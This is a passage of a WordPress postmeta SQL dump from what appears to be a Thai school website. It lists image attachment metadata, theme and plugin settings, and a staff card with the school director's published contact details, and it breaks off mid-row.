(919,292,'related',''),
(920,292,'_related','field_603b51c3e183e'),
(921,295,'related',''),
(922,295,'_related','field_603b51c3e183e'),
(924,297,'title_style','default'),
(925,297,'_title_style','field_5d1a0217cf408'),
(927,299,'title_style','default'),
(928,299,'_title_style','field_5d1a0217cf408'),
(929,300,'title_style','default'),
(930,300,'_title_style','field_5d1a0217cf408'),
(931,300,'related',''),
(932,300,'_related','field_603b51c3e183e'),
(934,301,'title_style','default'),
(935,301,'_title_style','field_5d1a0217cf408'),
(936,301,'related',''),
(937,301,'_related','field_603b51c3e183e'),
(939,302,'title_style','default'),
(940,302,'_title_style','field_5d1a0217cf408'),
(941,302,'related',''),
(942,302,'_related','field_603b51c3e183e'),
(944,304,'title_style','default'),
(945,304,'_title_style','field_5d1a0217cf408'),
(947,306,'title_style','default'),
(948,306,'_title_style','field_5d1a0217cf408'),
(949,307,'title_style','default'),
(950,307,'_title_style','field_5d1a0217cf408'),
(952,309,'title_style','default'),
(953,309,'_title_style','field_5d1a0217cf408'),
(955,311,'_wp_attached_file','2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.gif'),
(956,311,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:169:\"2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.gif\";s:8:\"filesize\";i:1820453;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-300x169.gif\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:14677;}s:5:\"large\";a:5:{s:4:\"file\";s:170:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-1024x576.gif\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:134472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:8972;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-768x432.gif\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:85106;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:170:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-1536x864.gif\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:290010;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-360x189.gif\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:20711;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(960,313,'title_style','default'),
(961,313,'_title_style','field_5d1a0217cf408'),
(962,313,'related',''),
(963,313,'_related','field_603b51c3e183e'),
(964,314,'_wp_attached_file','2024/07/จิตอาสา.gif'),
(965,314,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:33:\"2024/07/จิตอาสา.gif\";s:8:\"filesize\";i:55188867;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-300x169.gif\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:40934;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"จิตอาสา-1024x576.gif\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:538778;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:17696;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-768x432.gif\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:307881;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"จิตอาสา-1536x864.gif\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:1179893;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-360x189.gif\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:56637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(967,315,'title_style','default'),
(968,315,'_title_style','field_5d1a0217cf408'),
(969,315,'related',''),
(970,315,'_related','field_603b51c3e183e'),
(971,316,'_wp_attached_file','2024/07/จิตอาสา.png'),
(972,316,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:33:\"2024/07/จิตอาสา.png\";s:8:\"filesize\";i:5232687;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115385;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"จิตอาสา-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1306488;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50886;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:752932;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"จิตอาสา-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2781055;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:33:\"จิตอาสา-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:154983;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(975,317,'_wp_attached_file','2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.png'),
(976,317,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:169:\"2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.png\";s:8:\"filesize\";i:1434433;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:64618;}s:5:\"large\";a:5:{s:4:\"file\";s:170:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:506581;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36868;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:309622;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:170:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:996222;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:169:\"1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87919;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(979,318,'_wp_attached_file','2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1.png'),
(980,318,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:102:\"2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1.png\";s:8:\"filesize\";i:1892698;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:102:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80304;}s:5:\"large\";a:5:{s:4:\"file\";s:103:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:569801;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:102:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41788;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:102:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:362147;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:103:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1053505;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:102:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108211;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(983,319,'title_style','default'),
(984,319,'_title_style','field_5d1a0217cf408'),
(985,319,'related',''),
(986,319,'_related','field_603b51c3e183e'),
(989,321,'title_style','default'),
(990,321,'_title_style','field_5d1a0217cf408'),
(992,323,'title_style','default'),
(993,323,'_title_style','field_5d1a0217cf408'),
(994,324,'_edit_last','1'),
(995,324,'_edit_lock','1722481304:1'),
(996,325,'_wp_attached_file','2024/08/ผอ-1.png'),
(997,325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:564;s:6:\"height\";i:869;s:4:\"file\";s:20:\"2024/08/ผอ-1.png\";s:8:\"filesize\";i:513858;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"ผอ-1-195x300.png\";s:5:\"width\";i:195;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59726;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"ผอ-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27245;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"ผอ-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69059;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(998,326,'_wp_attached_file','2024/08/ผอ-1-1.png'),
(999,326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:561;s:6:\"height\";i:561;s:4:\"file\";s:22:\"2024/08/ผอ-1-1.png\";s:8:\"filesize\";i:318446;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"ผอ-1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84114;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"ผอ-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25188;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"ผอ-1-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70587;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1000,324,'_tmm_head','a:1:{i:0;a:15:{s:14:\"_tmm_firstname\";s:27:\"นางเสน่หา\";s:13:\"_tmm_lastname\";s:18:\"พลโสภา\";s:8:\"_tmm_job\";s:79:\"ตำแหน่ง ผู้อำนวยการโรงเรียน\";s:9:\"_tmm_desc\";s:148:\"ช่องทางการติดต่อ             \r\nโทรศัพท์ 093-325-2659              \r\nE-mail : phonsopha2509@gmail.com\";s:10:\"_tmm_photo\";s:67:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-1.png\";s:14:\"_tmm_photo_url\";s:0:\"\";s:13:\"_tmm_sc_type1\";s:8:\"facebook\";s:14:\"_tmm_sc_title1\";s:16:\"Facebook profile\";s:12:\"_tmm_sc_url1\";s:55:\"https://www.facebook.com/profile.php?id=100005786674629\";s:13:\"_tmm_sc_type2\";s:5:\"email\";s:14:\"_tmm_sc_title2\";s:6:\"E-mail\";s:12:\"_tmm_sc_url2\";s:23:\"phonsopha2509@gmail.com\";s:13:\"_tmm_sc_type3\";s:5:\"phone\";s:14:\"_tmm_sc_title3\";s:5:\"Phone\";s:12:\"_tmm_sc_url3\";s:12:\"093-325-2659\";}}'),
(1001,324,'_tmm_color','#333333'),
(1002,324,'_tmm_columns','3'),
(1003,324,'_tmm_original_font','yes'),
(1004,324,'_tmm_display_order','default'),
(1005,324,'_tmm_piclink_beh','new'),
(1007,328,'_edit_lock','1722480940:1'),
(1008,328,'_edit_last','1'),
(1009,328,'sg_popup_scripts','a:2:{s:2:\"js\";a:0:{}s:3:\"css\";s:0:\"\";}'),
(1010,328,'sg_popup_target','a:2:{s:11:\"sgpb-target\";a:1:{i:0;a:1:{i:0;a:1:{s:5:\"param\";s:10:\"everywhere\";}}}s:15:\"sgpb-conditions\";N;}'),
(1011,328,'sg_popup_events','a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:4:\"load\";s:5:\"value\";s:0:\"\";s:12:\"hiddenOption\";a:0:{}}}}'),
(1012,328,'sg_popup_options','a:44:{s:9:\"sgpb-type\";s:4:\"html\";s:15:\"sgpb-is-preview\";s:1:\"0\";s:14:\"sgpb-is-active\";s:0:\"\";s:34:\"sgpb-behavior-after-special-events\";a:1:{i:0;a:1:{i:0;a:1:{s:5:\"param\";s:12:\"select_event\";}}}s:20:\"sgpb-content-padding\";s:1:\"7\";s:18:\"sgpb-popup-z-index\";s:4:\"9999\";s:17:\"sgpb-popup-themes\";s:12:\"sgpb-theme-1\";s:18:\"sgpb-overlay-color\";s:0:\"\";s:20:\"sgpb-overlay-opacity\";s:3:\"0.8\";s:25:\"sgpb-content-custom-class\";s:16:\"sg-popup-content\";s:26:\"sgpb-background-image-mode\";s:9:\"no-repeat\";s:12:\"sgpb-esc-key\";s:2:\"on\";s:24:\"sgpb-enable-close-button\";s:2:\"on\";s:23:\"sgpb-close-button-delay\";s:1:\"0\";s:26:\"sgpb-close-button-position\";s:11:\"bottomRight\";s:24:\"sgpb-button-position-top\";s:0:\"\";s:26:\"sgpb-button-position-right\";s:1:\"9\";s:27:\"sgpb-button-position-bottom\";s:1:\"9\";s:25:\"sgpb-button-position-left\";s:0:\"\";s:17:\"sgpb-button-image\";s:0:\"\";s:23:\"sgpb-button-image-width\";s:2:\"21\";s:24:\"sgpb-button-image-height\";s:2:\"21\";s:17:\"sgpb-border-color\";s:7:\"#000000\";s:18:\"sgpb-border-radius\";s:1:\"0\";s:23:\"sgpb-border-radius-type\";s:1:\"%\";s:16:\"sgpb-button-text\";s:5:\"Close\";s:18:\"sgpb-overlay-click\";s:2:\"on\";s:25:\"sgpb-popup-dimension-mode\";s:14:\"responsiveMode\";s:33:\"sgpb-responsive-dimension-measure\";s:4:\"auto\";s:10:\"sgpb-width\";s:5:\"640px\";s:11:\"sgpb-height\";s:5:\"480px\";s:14:\"sgpb-max-width\";s:0:\"\";s:15:\"sgpb-max-height\";s:0:\"\";s:14:\"sgpb-min-width\";s:5:\"120px\";s:15:\"sgpb-min-height\";s:0:\"\";s:26:\"sgpb-open-animation-effect\";s:9:\"No effect\";s:27:\"sgpb-close-animation-effect\";s:9:\"No effect\";s:29:\"sgpb-enable-content-scrolling\";s:2:\"on\";s:16:\"sgpb-popup-order\";s:1:\"0\";s:16:\"sgpb-popup-delay\";s:1:\"0\";s:12:\"sgpb-post-id\";s:3:\"328\";s:25:\"sgpb-enable-popup-overlay\";s:2:\"on\";s:22:\"sgpb-button-image-data\";s:0:\"\";s:26:\"sgpb-background-image-data\";s:0:\"\";}'),
(1013,329,'title_style','default'),
(1014,329,'_title_style','field_5d1a0217cf408'),
(1015,330,'_edit_last','1'),
(1016,330,'_edit_lock','1722694572:1'),
(1017,330,'qa_question_status',''),
(1018,330,'qa_featured_questions','no'),
(1019,330,'mark_as_close','no'),
(1020,330,'qa_assign_to_send_mail',''),
(1021,330,'qa_assign_to',''),
(1022,330,'qa_view_count','79'),
(1048,342,'title_style','default'),
(1049,342,'_title_style','field_5d1a0217cf408'),
(1050,343,'qa_contact_email',''),
(1051,343,'qa_contact_name',''),
(1052,343,'qa_visiblity','public'),
(1053,343,'q_subscriber','a:1:{i:0;i:1;}'),
(1054,343,'polls','a:0:{}'),
(1055,343,'qa_view_count','79'),
(1056,344,'qa_answer_question_id','343'),
(1057,344,'qa_answer_is_private',''),
(1058,343,'last_activity_user_id','1'),
(1059,343,'last_activity_time','2024-08-01 03:36:00'),
(1060,345,'qa_answer_question_id','343'),
(1061,345,'qa_answer_is_private',''),
(1062,346,'qa_answer_question_id','343'),
(1063,346,'qa_answer_is_private',''),
(1073,349,'_edit_lock','1722694088:1'),
(1074,349,'_edit_last','1'),
(1075,349,'title_style','default'),
(1076,349,'_title_style','field_5d1a0217cf408'),
(1077,350,'title_style','default'),
(1078,350,'_title_style','field_5d1a0217cf408'),
(1086,354,'title_style','default'),
(1087,354,'_title_style','field_5d1a0217cf408'),
(1088,355,'_edit_lock','1724223454:1'),
(1089,355,'_edit_last','1'),
(1090,355,'title_style','hidden'),
(1091,355,'_title_style','field_5d1a0217cf408'),
(1092,356,'title_style','default'),
(1093,356,'_title_style','field_5d1a0217cf408'),
(1096,359,'title_style','default'),
(1097,359,'_title_style','field_5d1a0217cf408'),
(1098,360,'title_style','default'),
(1099,360,'_title_style','field_5d1a0217cf408'),
(1100,361,'title_style','default'),
(1101,361,'_title_style','field_5d1a0217cf408'),
(1102,362,'_edit_lock','1724995217:1'),
(1103,362,'_edit_last','1'),
(1104,362,'title_style','default'),
(1105,362,'_title_style','field_5d1a0217cf408'),
(1106,363,'title_style','default'),
(1107,363,'_title_style','field_5d1a0217cf408'),
(1109,365,'title_style','default'),
(1110,365,'_title_style','field_5d1a0217cf408'),
(1111,16,'_wp_old_date','2024-07-27'),
(1113,17,'_wp_old_date','2024-07-27'),
(1115,18,'_wp_old_date','2024-07-27'),
(1117,19,'_wp_old_date','2024-07-27'),
(1119,20,'_wp_old_date','2024-07-27'),
(1122,367,'title_style','default'),
(1123,367,'_title_style','field_5d1a0217cf408'),
(1125,369,'title_style','default'),
(1126,369,'_title_style','field_5d1a0217cf408'),
(1127,370,'_edit_lock','1722518753:1'),
(1128,371,'_wp_attached_file','2024/08/1-67.png'),
(1129,371,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1122;s:4:\"file\";s:16:\"2024/08/1-67.png\";s:8:\"filesize\";i:1103152;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"1-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:105936;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"1-67-725x1024.png\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:830582;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"1-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43134;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"1-67-768x1085.png\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:910848;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"1-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117469;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1131,370,'_thumbnail_id','371'),
(1132,370,'_edit_last','1'),
(1133,370,'title_style','default'),
(1134,370,'_title_style','field_5d1a0217cf408'),
(1135,370,'related',''),
(1136,370,'_related','field_603b51c3e183e'),
(1137,372,'title_style','default'),
(1138,372,'_title_style','field_5d1a0217cf408'),
(1139,372,'related',''),
(1140,372,'_related','field_603b51c3e183e'),
(1141,373,'_edit_lock','1722519099:1'),
(1142,374,'_wp_attached_file','2024/08/2-67.png'),
(1143,374,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1122;s:4:\"file\";s:16:\"2024/08/2-67.png\";s:8:\"filesize\";i:1104786;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"2-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110287;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"2-67-725x1024.png\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:895816;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"2-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40975;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"2-67-768x1085.png\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:983440;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"2-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113003;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1145,373,'_thumbnail_id','374'),
(1146,373,'_edit_last','1'),
(1148,373,'title_style','default'),
(1149,373,'_title_style','field_5d1a0217cf408'),
(1150,375,'title_style','default'),
(1151,375,'_title_style','field_5d1a0217cf408'),
(1152,376,'_edit_lock','1722519053:1'),
(1153,377,'_wp_attached_file','2024/08/3-67.png'),
(1154,377,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1122;s:4:\"file\";s:16:\"2024/08/3-67.png\";s:8:\"filesize\";i:1177700;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"3-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110038;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"3-67-725x1024.png\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:918725;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"3-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44985;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"3-67-768x1085.png\";s:5:\"width\";i:76